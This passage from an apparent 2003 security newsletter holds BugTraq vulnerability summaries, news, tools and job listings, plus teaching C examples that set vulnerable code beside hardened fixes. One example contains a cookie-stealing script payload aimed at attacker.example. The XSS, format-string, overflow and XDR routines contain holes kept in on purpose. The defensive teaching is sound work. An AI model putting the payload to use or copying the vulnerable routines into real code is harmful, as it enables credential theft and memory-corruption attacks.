BugTraq ID: 8287
Remote: Yes
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8287
Summary:
mod_mylo is a third party module for Apache HTTP server. The module is
designed to log data into a MySQL database in addition to standard
logging.
mod_mylo has been reported prone to a remotely exploitable buffer overflow
vulnerability.
The issue presents itself due to insufficient bounds checking performed on
HTTP requests before the HTTP request string is copied into a buffer in
memory. Data exceeding the size of the buffer will corrupt adjacent
memory. Because memory adjacent to this buffer has been reported to store
a saved instruction pointer, it is possible for a remote attacker to
influence program execution flow. Ultimately a remote attacker may exploit
this condition to execute arbitrary instructions in the context of the
Apache HTTP server.
This issue has been reported to affect mod_mylo version 0.2.1 and all
versions prior.
14. MacOS X Third Party Application Screen Effects Password Protection Bypass
Vulnerability
BugTraq ID: 8293
Remote: No
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8293
Summary:
Apple MacOS X has a screen saver, entitled Screen Effects, with a password
feature.
Screen Effects has been reported prone to a vulnerability where third
party applications may allow a user who has physical access to the host
to kill the Screen Effects process and thereby subvert desktop password
protection.
Under certain circumstances, this may allow an attacker to gain
unauthorized access to a vulnerable host.
15. HP PHNE_27128 Denial Of Service Introduction Vulnerability
BugTraq ID: 8291
Remote: No
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8291
Summary:
HP PHNE_27128 is a cumulative patch released by HP to address non-critical
issues in nettl and nettladm.
It has been reported that the PHNE_27128 patch has introduced a potential
local denial of service vulnerability. HP has announced that this
vulnerability could be exploited by a non-privileged user to trigger a
system panic on a target system.
This BID will be updated as further technical details regarding this
vulnerability are disclosed.
16. HP PHNE_26413 Denial Of Service Introduction Vulnerability
BugTraq ID: 8289
Remote: No
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8289
Summary:
HP PHNE_26413 is a patch released by HP to address non-critical issues in
nettl, netfmt and nettladm.
It has been reported that the PHNE_26413 patch has introduced a potential
local denial of service vulnerability. HP has announced that this
vulnerability could be exploited by a non-privileged user to trigger a
system panic on a target system.
This BID will be updated as further technical details regarding this
vulnerability are disclosed.
17. Softshoe Parse-file Cross-Site Scripting Vulnerability
BugTraq ID: 8294
Remote: Yes
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8294
Summary:
Softshoe is a human resources application.
Softshoe is allegedly prone to cross-site scripting attacks. The issue
exists in the 'parse_file' component and may be exploited by including
HTML and script code as input to the 'TEMPLATE' URI parameter. An
attacker can exploit this issue by creating a malicious link that contains
hostile HTML or script code to a site that is hosting the vulnerable
software. If such a link is visited, the attacker-supplied code may be
rendered in the user's web browser. This would occur in the context of
the site hosting the software.
Exploitation of this issue could allow for theft of cookie-based
authentication credentials or other attacks.
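The three HTML injection and cross-site scripting items above (PBLang
docs.php, Gallery search.php, Softshoe parse_file) share one missing step:
untrusted input is echoed into a page without HTML escaping. The following
is an added example written for this newsletter, not code from any of those
projects; the function and buffer names are its own, and the search-results
markup is a constructed stand-in for each application's real output.

```c
/* Added example (not Gallery, PBLang or Softshoe code): escape untrusted
 * text before echoing it into an HTML page. Function and buffer names are
 * the example's own. */
#include <stdio.h>
#include <string.h>

/* Writes an HTML-escaped copy of `in` into `out` (capacity `outlen`).
 * Returns the number of bytes the escaped form needs, excluding the NUL,
 * so a caller can detect truncation by comparing against outlen. Once
 * output stops fitting, nothing further is written (no partial entities). */
size_t html_escape(const char *in, char *out, size_t outlen)
{
    size_t need = 0, pos = 0;
    int trunc = (out == NULL || outlen == 0);
    for (const char *p = in; *p; p++) {
        const char *rep;
        char one[2] = { *p, '\0' };
        switch (*p) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   rep = one;      break;
        }
        size_t rl = strlen(rep);
        need += rl;
        if (!trunc) {
            if (pos + rl < outlen) {        /* keep one byte for the NUL */
                memcpy(out + pos, rep, rl);
                pos += rl;
            } else {
                trunc = 1;
            }
        }
    }
    if (out && outlen)
        out[pos] = '\0';
    return need;
}

/* Vulnerable pattern: the untrusted query is spliced into markup verbatim. */
int render_search_unsafe(const char *query, char *page, size_t pagelen)
{
    return snprintf(page, pagelen, "<p>Results for: %s</p>", query);
}

/* Hardened pattern: escape first, then splice. Returns -1 and renders
 * nothing if the escaped form would not fit the working buffer. */
int render_search_safe(const char *query, char *page, size_t pagelen)
{
    char esc[512];
    if (html_escape(query, esc, sizeof esc) >= sizeof esc)
        return -1;
    return snprintf(page, pagelen, "<p>Results for: %s</p>", esc);
}

int main(void)
{
    /* Constructed sample input in the shape of a hostile search term. */
    const char *q = "<script>document.location='http://attacker.example/?'"
                    "+document.cookie</script>";
    char page[1024];
    render_search_unsafe(q, page, sizeof page);
    puts(page);   /* the script tag lands in the page as live markup */
    render_search_safe(q, page, sizeof page);
    puts(page);   /* &lt;script&gt;... renders as inert text */
    return 0;
}
```

The escaper refuses to emit a partial entity on truncation and the safe
renderer rejects rather than truncates, since a half-written `&lt;` is its
own injection risk.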
18. Mini SQL Remote Format String Vulnerability
BugTraq ID: 8295
Remote: Yes
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8295
Summary:
Mini SQL (mSQL) is a relational database management system.
mSQL has been reported prone to a remotely exploitable format string
vulnerability.
Reportedly a remote attacker may send malicious format specifiers to
trigger the issue. This issue is due to erroneous use of a formatting
function, which allows format specifiers to be supplied by an external
source, in this case a remote user. By passing specially crafted format
specifiers through a session, an attacker may corrupt process memory and
thereby execute arbitrary code with the privileges of the affected daemon,
which is typically root.
This vulnerability has been reported to affect mSQL version 1.3 and all
prior versions; other versions may also be affected.
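An added example of the format string pattern described above, written in
C for this newsletter and not taken from the mSQL source: the same network
data passed once as the format argument and once as a "%s" parameter. The
"%%" sequence is used in the sample because it is the one specifier that
consumes no argument and so can be shown safely; the function names are
the example's own.

```c
/* Added example, not mSQL source: the "erroneous use of a formatting
 * function" pattern. The vulnerable routine passes data that came off the
 * network straight in as the format argument; the fixed one passes it as a
 * "%s" parameter. Names are the example's own. */
#include <stdio.h>
#include <string.h>

/* Vulnerable: attacker-controlled bytes become the format string, so any
 * %-sequences they contain are interpreted by the formatter. The pragmas
 * silence the compiler warning that would normally flag exactly this. */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
#pragma GCC diagnostic ignored "-Wformat-nonliteral"
int log_query_vulnerable(const char *client_data, char *out, size_t outlen)
{
    return snprintf(out, outlen, client_data);
}
#pragma GCC diagnostic pop

/* Fixed: the format is a constant; client_data is only ever an argument. */
int log_query_fixed(const char *client_data, char *out, size_t outlen)
{
    return snprintf(out, outlen, "%s", client_data);
}

int main(void)
{
    /* Constructed sample: "%%" consumes no argument, so it demonstrates the
     * interpretation without undefined behaviour. In a real attack "%x"
     * would walk the stack and "%n" would write to memory. */
    const char *wire = "SELECT 100%% done";
    char buf[64];
    log_query_vulnerable(wire, buf, sizeof buf);
    printf("vulnerable: %s\n", buf);   /* the %% was interpreted: "100% done" */
    log_query_fixed(wire, buf, sizeof buf);
    printf("fixed:      %s\n", buf);   /* data passed through untouched */
    return 0;
}
```

Any data whose origin is outside the process belongs on the argument side
of the formatter, never on the format side; the audit is a grep for
printf-family calls whose format is not a string literal.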
19. XBlast HOME Environment Variable Buffer Overflow Vulnerability
BugTraq ID: 8296
Remote: No
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8296
Summary:
XBlast is a multi-player arcade game available for Windows and various
Linux distributions.
A locally exploitable buffer overflow vulnerability has been reported in
XBlast 2.6.1.
XBlast does not perform adequate bounds checking on input supplied via the
HOME environment variable. Successful exploitation can lead to arbitrary
code execution. XBlast is typically installed setgid games on Linux
systems, making it possible to exploit this issue to gain these
privileges.
20. KDE Konqueror HTTP REFERER Authentication Credential Leak Vulnerability
BugTraq ID: 8297
Remote: Yes
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8297
Summary:
Konqueror is a freely available, open source web browser distributed and
maintained by the KDE project. It is available for the Unix and Linux
operating systems.
It has been reported that a problem in KDE Konqueror may result in the
leak of authentication credentials through the HTTP REFERER header field.
This could result in an attacker gaining unauthorized access to
authentication information.
When a user follows a link from a page whose URL embeds authentication
credentials, the browser sends that full URL, credentials included, in
the HTTP Referer header of the request to the destination site, where it
is recorded in that site's referrer log. This could result in unauthorized
access to the user's account on the referring site.
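An added example, not Konqueror code, of the check a browser should apply
before emitting a Referer header: drop any userinfo ("user:password@") from
the referring URL. The function name and the sample URLs are the
example's own.

```c
/* Added example, not Konqueror code: build the Referer value a browser
 * should send by dropping the userinfo part ("user:password@") of the
 * referring URL. Function name and sample URLs are the example's own. */
#include <stdio.h>
#include <string.h>

/* Copies `url` into `out` without any userinfo between "://" and the host.
 * Returns 1 if credentials were removed, 0 if the URL was already clean,
 * -1 if `out` is too small. Only the authority part (up to the first '/',
 * '?' or '#') is inspected, so an '@' in the path or query is left alone. */
int referer_strip_userinfo(const char *url, char *out, size_t outlen)
{
    const char *auth = strstr(url, "://");
    const char *at = NULL;
    if (auth) {
        auth += 3;
        const char *end = auth + strcspn(auth, "/?#");  /* end of authority */
        for (const char *p = auth; p < end; p++)
            if (*p == '@') at = p;    /* last '@' in authority ends userinfo */
    }
    size_t n;
    if (!at) {
        n = strlen(url);
        if (n + 1 > outlen) return -1;
        memcpy(out, url, n + 1);
        return 0;
    }
    size_t head = (size_t)(auth - url);   /* "scheme://" */
    size_t tail = strlen(at + 1);         /* host and everything after */
    n = head + tail;
    if (n + 1 > outlen) return -1;
    memcpy(out, url, head);
    memcpy(out + head, at + 1, tail + 1); /* includes the NUL */
    return 1;
}

int main(void)
{
    /* Constructed sample referring URLs. */
    const char *samples[] = {
        "http://alice:s3cret@example.com/private/page.html?x=1",
        "http://example.com/mail/a@b",
    };
    char referer[256];
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        int r = referer_strip_userinfo(samples[i], referer, sizeof referer);
        printf("%s -> %s (stripped=%d)\n", samples[i], referer, r);
    }
    return 0;
}
```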
21. Valve Software Half-Life Client Connection Routine Buffer Overflow Vulnerability
BugTraq ID: 8299
Remote: Yes
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8299
Summary:
Half-Life is a game distributed and maintained by Valve Software. It
includes features that allow users to game locally or across a network.
The game engine is used in many modifications.
Half-Life Client has been reported prone to a remotely exploitable buffer
overflow condition.
The issue presents itself in the client connection routine, used by the
client to negotiate a connection to the Half-Life game server. Due to a
lack of sufficient bounds checking performed on both the parameter and
value of data transmitted from the game server to the client, a malicious
server may execute arbitrary code on an affected client.
It has been reported that a parameter of 516 bytes and a value of 268
bytes will corrupt data adjacent to an insufficiently sized buffer. This
may allow a remote attacker to corrupt a saved instruction pointer and
thereby influence program execution flow. Ultimately the attacker may
trigger the execution of supplied instructions in the context of the user
running the affected game client.
It should be noted that although this vulnerability has been reported to
affect Half-Life version 1.1.1.0, previous versions are likely affected.
22. Valve Software Half-Life Dedicated Server Malformed Parameter Loop Denial Of
Service Vulnerability
BugTraq ID: 8301
Remote: Yes
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8301
Summary:
Half-Life is a game distributed and maintained by Valve Software. It
includes features that allow users to game locally or across a network.
The game engine is used in many modifications.
Half-Life servers are prone to a denial of service that may be exploited
by a malicious client. By supplying malformed parameters in a client
packet during a request to join a multiplayer game, it may be possible to
cause a loop within the server program. This would result in a crash of
the vulnerable server.
This vulnerability affects the server bundled with Half-Life and the free
Dedicated Server for both Windows and Linux operating systems.
23. Valve Software Half-Life Dedicated Server Multiplayer Request Buffer Overflow
Vulnerability
BugTraq ID: 8300
Remote: Yes
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8300
Summary:
Half-Life is a game distributed and maintained by Valve Software. It
includes features that allow users to game locally or across a network.
The game engine is used in many modifications.
Half-Life servers are prone to a buffer overflow that may be exploited by
a malicious client. By supplying overly long parameters in a client packet
during a request to join a multiplayer game, it may be possible to corrupt
adjacent locations of stack memory with attacker-supplied data. This could
allow for code execution in the context of the vulnerable server. It
should be noted that the type of data sent may be restricted by the
Half-Life protocol, which may make exploitation more difficult, as certain
characters will not be permitted in the client request.
This vulnerability affects the server bundled with Half-Life and the free
Dedicated Server for both Windows and Linux operating systems.
24. Linux Kernel 2.4 XDR Packet Handler For NFSv3 Remote Denial Of Service
Vulnerability
BugTraq ID: 8298
Remote: Yes
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8298
Summary:
XDR (External Data Representation) is a protocol governing the platform
independent description and encoding of data, in this particular case it
is used in conjunction with the Linux implementation of NFSv3 (Network
File System), used to share system based resources across a network. NFS
uses XDR to describe the format of its data.
Linux Kernel 2.4 XDR handler routines for NFSv3 have been reported prone
to a remote denial of service vulnerability.
The issue presents itself in the decode_fh XDR handler routine contained
in the nfs3xdr.c kernel source file. The issue is due to a signed/unsigned
mismatch, when processing the size field of an XDR packet.
A malicious attacker may bypass the signed sanity check
(if (size > NFS3_FHSIZE)) in the decode_fh XDR handler routine by crafting
an XDR packet whose size field contains the two's complement
representation of -1, 0xFFFFFFFF. Because the comparison is signed, -1 is
not greater than NFS3_FHSIZE and the check passes; the value is then
passed to a memcpy() call, which treats it as the unsigned value
0xFFFFFFFF (4 GB) for its size parameter. The resulting massive memcpy
operation will trigger a kernel panic.
It has been reported that the target host may need an accessible exported
directory, if this vulnerability is to be successfully exploited. It
should be noted that other methods to trigger the vulnerability might also
be possible.
This vulnerability has been reported to affect the Linux 2.4 kernel tree.
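An added example, written for this newsletter and not taken from the
kernel source, of the signed/unsigned mismatch described above, modelled
on a constructed XDR file-handle field. NFS3_FHSIZE is the protocol's
64-byte maximum handle size; the handler names are the example's own, and
the vulnerable variant only models the decision the real code would make,
it does not perform the oversized copy.

```c
/* Added example, not kernel source: the signed/unsigned mismatch pattern
 * described for decode_fh, shown on a constructed XDR file-handle field.
 * NFS3_FHSIZE is the real protocol constant (64); the handler and buffer
 * names are the example's own. */
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define NFS3_FHSIZE 64

/* XDR encodes a 32-bit big-endian length before the opaque bytes. */
static uint32_t xdr_u32(const unsigned char *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/* Vulnerable shape: size is read into a signed int, so 0xFFFFFFFF is -1,
 * the "size > NFS3_FHSIZE" test passes, and memcpy would receive (size_t)-1.
 * Returns 1 if the packet would have reached the memcpy, 0 if rejected.
 * The copy itself is NOT performed; only its decision is modelled. */
int decode_fh_vulnerable_accepts(const unsigned char *pkt, size_t pktlen)
{
    if (pktlen < 4) return 0;
    int size = (int)xdr_u32(pkt);          /* signed, as in the bug */
    if (size > NFS3_FHSIZE)
        return 0;                          /* only catches large positives */
    /* memcpy(fh.data, pkt + 4, size);  <- size_t conversion makes this ~4 GB */
    return 1;
}

/* Fixed shape: compare as unsigned and also check against the bytes that
 * actually arrived, then perform the bounded copy. Returns the number of
 * handle bytes copied, or -1 on a rejected packet. */
int decode_fh_fixed(const unsigned char *pkt, size_t pktlen,
                    unsigned char fh[NFS3_FHSIZE])
{
    if (pktlen < 4) return -1;
    uint32_t size = xdr_u32(pkt);          /* unsigned */
    if (size > NFS3_FHSIZE) return -1;     /* 0xFFFFFFFF rejected here */
    if (size > pktlen - 4) return -1;      /* length must fit the datagram */
    memcpy(fh, pkt + 4, size);
    return (int)size;
}

int main(void)
{
    /* Constructed packets: a benign 32-byte handle and the -1 length. */
    unsigned char good[4 + 32] = { 0, 0, 0, 32 };
    unsigned char evil[4] = { 0xFF, 0xFF, 0xFF, 0xFF };
    unsigned char fh[NFS3_FHSIZE];
    printf("good: vulnerable accepts=%d fixed copies=%d\n",
           decode_fh_vulnerable_accepts(good, sizeof good),
           decode_fh_fixed(good, sizeof good, fh));
    printf("evil: vulnerable accepts=%d fixed copies=%d\n",
           decode_fh_vulnerable_accepts(evil, sizeof evil),
           decode_fh_fixed(evil, sizeof evil, fh));
    return 0;
}
```

The second check in the fixed routine matters as much as the first: a
length that is below NFS3_FHSIZE but larger than the datagram still reads
past the received data.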
25. NetScreen ScreenOS TCP Window Size Remote Denial Of Service Vulnerability
BugTraq ID: 8302
Remote: Yes
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8302
Summary:
NetScreen is a line of Internet security appliances integrating firewall,
VPN and traffic management features. ScreenOS is the software used to
manage and configure the firewall. NetScreen supports Microsoft Windows
95, 98, ME, NT and 2000 clients.
NetScreen ScreenOS has been reported prone to a vulnerability that may
allow a remote user to trigger a denial of service condition in an
affected appliance.
It has been reported that an attacker who adjusts the configuration values
controlling the TCP window size on their own host, and then connects to a
target appliance, may trigger a denial of service in that appliance.
It has been reported that the issue only affects NetScreen appliances that
are configured to use management services. For example HTTP, SSH or
Telnet.
This issue only affects some ScreenOS 4.0.1rx and 4.0.3rx releases.
NetScreen IDP, NetScreen Firewall/VPN products running ScreenOS 3.x and
earlier, 4.0.0, and 4.0.2 are not vulnerable. The vendor has supplied
upgrades for affected versions.
26. Multiple ManDB Utility Local Buffer Overflow Vulnerabilities
BugTraq ID: 8303
Remote: No
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8303
Summary:
mandb is a utility that is used to initialize or manually update the index
database caches that are usually maintained by the man utility.
mandb has been reported to be affected by multiple buffer overflow
vulnerabilities.
These issues present themselves in the ult_src(), add_to_dirlist() and
test_for_include() functions and in the PATH/MANPATH argument handler of
mandb.
The issues are due to insufficient bounds checking performed on
user-supplied data before it is copied into reserved buffers in memory. A
local attacker may supply excessive data in a manner sufficient to trigger
these issues and in doing so corrupt arbitrary memory. It has been
conjectured that an attacker may ultimately exploit this issue to execute
arbitrary instructions, with elevated privileges.
Code execution would occur in the context of the mandb utility, typically
user 'man'.
This BID will be split up into unique BIDs as these issues are analyzed in
further detail.
27. Sun Solaris Runtime Linker LD_PRELOAD Local Buffer Overflow Vulnerability
BugTraq ID: 8305
Remote: No
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8305
Summary:
The Sun Solaris runtime linker (ld) is the utility used to link shared
objects to executables at runtime. The environment variable LD_PRELOAD is
used to define a library that will be prioritized above others when
seeking shared libraries.
The Sun Solaris ld runtime linker has been reported prone to a buffer
overflow vulnerability. It has been conjectured that the issue presents
itself due to insufficient bounds checking performed in the routines used
to process the value of LD_PRELOAD. The affected routine is thought to be
called in the case that an unprivileged user specifies an LD_PRELOAD value
when invoking a setuid binary.
It has been reported that a local attacker may craft an LD_PRELOAD value
consisting of 1200 bytes of data, prefixed and suffixed with a forward
slash. The attacker may then invoke a setuid binary that is dynamically
linked to trigger the condition in the ld linker. Excessive data copied
from the LD_PRELOAD value may corrupt internal memory and ultimately
result in the execution of arbitrary code with elevated privileges.
It should be noted that this problem affects systems with the following
attributes:
Sparc Solaris 2.6 with patch 107733-10, and without patch 107733-11.
Sparc Solaris 7 with patches 106950-14 through 106950-22, and without patch 106950-23.
Sparc Solaris 8 with patches 109147-07 through 109147-24, and without patch 109147-25.
Sparc Solaris 9 without patch 112963-09.
Intel Solaris 2.6 with patch 107734-10, and without patch 107734-11.
Intel Solaris 7 with patches 106951-14 through 106951-22, and without patch 106951-23.
Intel Solaris 8 with patches 109148-07 through 109148-24, and without patch 109148-25.
Intel Solaris 9 without patch 113986-05.
28. SGI IRIX NSD AUTH_UNIX GID List Privilege Escalation Vulnerability
BugTraq ID: 8304
Remote: Yes
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8304
Summary:
The IRIX unified nsd (Name Service Daemon) provides a generic interface to
a number of network lookup services including DNS, NIS and LDAP.
SGI has reported a vulnerability in IRIX that may permit attackers to gain
remote root privileges via the nsd server and modules. The problem is a
heap overflow in the RPC AUTH_UNIX functionality of the nsd service.
By submitting a malicious string to the service, which typically handles
RPC AUTH_UNIX requests on UDP ports above 1024, it is possible to corrupt
heap memory and execute attacker-supplied instructions. This problem would
allow an attacker to gain access to the vulnerable system with the
privileges of the nsd service.
29. Symantec Quarantine Server Disconnect Denial Of Service Vulnerability
BugTraq ID: 8306
Remote: Yes
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8306
Summary:
Symantec Quarantine Server is a component of Symantec and Norton AntiVirus
Corporate Edition. The server can be configured to listen on a
user-specified port.
Symantec Quarantine Server (qserver.exe) is prone to a denial of service
vulnerability. This can occur when a client disconnects from the service
before sending any data. This can cause CPU usage for the service to
spike to 100%, potentially denying availability of other resources.
The Quarantine Server must be restarted for normal functionality to resume.
30. XConq Multiple Environment Variable Buffer Overflow Vulnerabilities
BugTraq ID: 8307
Remote: No
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8307
Summary:
xconq is a multiplayer game that is available for a number of Unix/Linux
variants.
Multiple locally exploitable buffer overflows have been reported in xconq.
This is due to insufficient bounds checking of data supplied via the USER
and DISPLAY environment variables. This may permit a local attacker to
corrupt adjacent regions of stack memory with specific values, allowing
execution of arbitrary code in the context of the program, which is
typically installed setgid 'games'.
This issue appears similar to BID 1495. Further analysis of these issues
may determine that the issues are identical, in which case this BID will
be retired and the earlier BID will be updated.
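The XBlast (item 19) and xconq (item 30) issues, like the mod_mylo, EF
Commander and Half-Life items, come down to copying attacker-controlled
data into a fixed-size buffer without a length check. The following is an
added example of that pattern beside its bounded form, written for this
newsletter and not taken from either game's source; the 256-byte buffer,
the config-file suffix and the function names are the example's own.

```c
/* Added example, not XBlast or xconq code: the unchecked copy of an
 * environment variable into a fixed-size buffer (the HOME, USER and DISPLAY
 * issues above) beside the bounded version. The function names, the
 * 256-byte buffer and the ".xblastrc" suffix are the example's own; the
 * value is taken as a parameter rather than read from the real environment. */
#include <stdio.h>
#include <string.h>

#define PATH_BUF 256

/* Vulnerable shape: strcpy/strcat with no length check. With a 600-byte
 * HOME this writes far past `out` and smashes the stack. Only ever called
 * with a short value in this example. */
void build_config_path_unsafe(const char *home, char *out /* PATH_BUF */)
{
    strcpy(out, home);
    strcat(out, "/.xblastrc");
}

/* Hardened shape: check the combined length before copying; refuse rather
 * than truncate, because a silently truncated path is its own bug class.
 * Returns 0 on success, -1 if the value does not fit. */
int build_config_path_safe(const char *home, char *out, size_t outlen)
{
    const char suffix[] = "/.xblastrc";
    size_t hl = strlen(home);
    if (hl + sizeof suffix > outlen)       /* sizeof suffix counts the NUL */
        return -1;
    memcpy(out, home, hl);
    memcpy(out + hl, suffix, sizeof suffix);
    return 0;
}

/* How many bytes past `outlen` the unsafe copy would write for this value,
 * 0 if it fits. Lets a reviewer size the overrun without triggering it. */
size_t overflow_bytes(const char *home, size_t outlen)
{
    size_t need = strlen(home) + sizeof "/.xblastrc";
    return need > outlen ? need - outlen : 0;
}

int main(void)
{
    char path[PATH_BUF];
    char hostile[600];                           /* constructed oversized value */
    memset(hostile, 'A', sizeof hostile - 1);
    hostile[sizeof hostile - 1] = '\0';

    build_config_path_unsafe("/home/alice", path);
    printf("benign: %s\n", path);
    printf("hostile would overrun by %zu bytes\n",
           overflow_bytes(hostile, PATH_BUF));
    printf("safe rejects hostile: %d\n",
           build_config_path_safe(hostile, path, sizeof path));
    return 0;
}
```

Because these games run setgid games, the overrun is reachable by any
local user; the bounded routine closes it regardless of who set HOME.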
III. SECURITYFOCUS NEWS AND COMMENTARY
------------------------------------------
1. Fed: Cyberterror fears missed real threat
By Kevin Poulsen
A top U.S. cyber security official says the government was looking for
imagined terrorist hackers, while real terrorists were plotting 9-11.
http://www.securityfocus.com/news/6589
2. Panel Probes the Half-life of Bugs
By Kevin Poulsen
Researchers find that software vulnerabilities have a predictable decay
rate, and the Microsoft RPC hole is currently the most prevalent on the
net.
http://www.securityfocus.com/news/6568
3. UK e-voting pilots deeply flawed
By John Leyden, The Register
A leading British academic has warned of the shortcomings of electronic
voting schemes tried at this year's local elections.
http://www.securityfocus.com/news/6580
4. Yaha usurps Klez
By John Leyden, The Register
Yaha-E displaced Klez as the most common viral menace on the Internet over
the last month, according to Messagelabs.
http://www.securityfocus.com/news/6579
IV. SECURITYFOCUS TOP 6 TOOLS
-----------------------------
1. PeerProtect v0.2
by Poulet Fabrice
Relevant URL:
http://www.atout.be/
Platforms: Linux, POSIX
Summary:
PeerProtect is an addon for Jay's firewall that generates a file which
contains all IP addresses from the RIAA and MPAA, etc. and will protect
peer-to-peer programs from them.
2. DSPAM v2.6.3
by Jonathan A. Zdziarski
Relevant URL:
http://www.networkdweebs.com/software/dspam/
Platforms: UNIX
Summary:
DSPAM is a server-side anti-spam agent for UNIX email servers. It
masquerades as the email server's local delivery agent and filters/learns
SPAM using a Bayesian statistical approach which provides an
administratively maintenance-free, self-learning Anti-Spam service. Each
email is broken down into its most interesting tokens, each assigned a
spam probability. All probabilities are then combined to produce a
statistical probability of spam. This approach, applied to a mature corpus
of email, has the potential to yield a 99.5% success rate with only 0.03%
chance of false positives.
3. pkdump v0.96.2
by dsmoker
Relevant URL:
http://pkdump.sourceforge.net/pkdumpage.html
Platforms: Linux, POSIX
Summary:
pkdump detects TCP and UDP port scans and connection attempts from foreign
hosts over the Internet.
4. Dante v1.1.14
by Inferno Nettverk A/S, info (at) inet (dot) no [email concealed]
Relevant URL:
http://www.inet.no/dante/
Platforms: Digital UNIX/Alpha, IRIX, Linux, OpenBSD, Solaris, SunOS
Summary:
Dante is a free implementation of the proxy protocols socks version 4,
socks version 5 (rfc1928), and msproxy. It can be used as a firewall
between networks. The package consists of two parts, a socks server and a
proxy client which supports socks, msproxy, and HTTP proxies. Commercial
support is available.
5. System Rescue CD v0.2.0
by François Dupoux
Relevant URL:
http://systemrescuecd.sourceforge.net/
Platforms: Linux
Summary:
SystemRescueCd is a Linux system available from a bootable CDROM that
provides an easy way to perform administrative tasks on your computer,
such as creating and editing the partitions of the hard disk or backing up
data. It contains a lot of system utilities (such as parted, qtparted,
partimage, and fstools) and basic utilities (such as editors, midnight
commander, and network tools).
6. FSlint v2.0.2
by pixelbeat
Relevant URL:
http://www.iol.ie/~padraiga/fslint/
Platforms: POSIX, UNIX
Summary:
FSlint is a toolkit to find various forms of lint on a filesystem. At the
moment it reports duplicate files, bad symbolic links, troublesome file
names, empty directories, non stripped executables, temporary files,
duplicate/conflicting (binary) names, and unused ext2 directory blocks.
V. SECURITY JOBS SUMMARY
------------------------
1. Systems Security Engineer (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331403
2. Looking for a Software Developer or Researcher Position (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331400
3. Technical Operations Manager vacancy (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331405
4. Two security positions, one in PA and one in DC (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331392
5. Network Security Engineer relocating to PA (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331402
6. Security Engineer position - Montgomery, AL (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331409
7. Question about opportunities for Americans outside the US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331395
8. Installation & Support Technician (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331397
9. Ethical Hacker Needed -- Chicago (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331393
10. Security Software Sales opportunity- Federal (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331398
11. Security Software Sales opportunities- Midwest, Southeast/west (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331394
12. Information Security Architect - Franklin Lakes, NJ, USA (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331396
13. Cisco is looking for a Sr. Microsoft security expert (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331406
14. Sr. IA Engineer to work on program in Wash., DC (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331401
15. IA Program Manager (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331408
16. Full time IT Auditor position in Pittsburgh PA (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331404
17. Seeking Information Security Position in the Washington, DC Metro Area (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331407
18. Seattle - Security Sales (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331399
19. Google: Network Security Engineer (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330989
20. Fulltime Test positions -Northern Va (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330992
21. Symantec's MSS practice looking for security device expert - Alexandria, VA
(Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330988
22. Senior Security Professional seeking post (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330991
23. Senior Security Analyst Opportunity - Alphatech Corporation (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330983
24. IMMEDIATE OPENING - Vulnerability Assessment, Reston, VA (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330990
25. IMMEDIATE OPENING - Sr. IDS Manager, Bethesda, MD (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330984
26. Senior IT Auditor (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330982
27. System Security Analyst (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330997
28. IT Security Auditor (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330981
29. Top Secret Cleared Security Professionals Wanted (Thread)
Relevant URL:
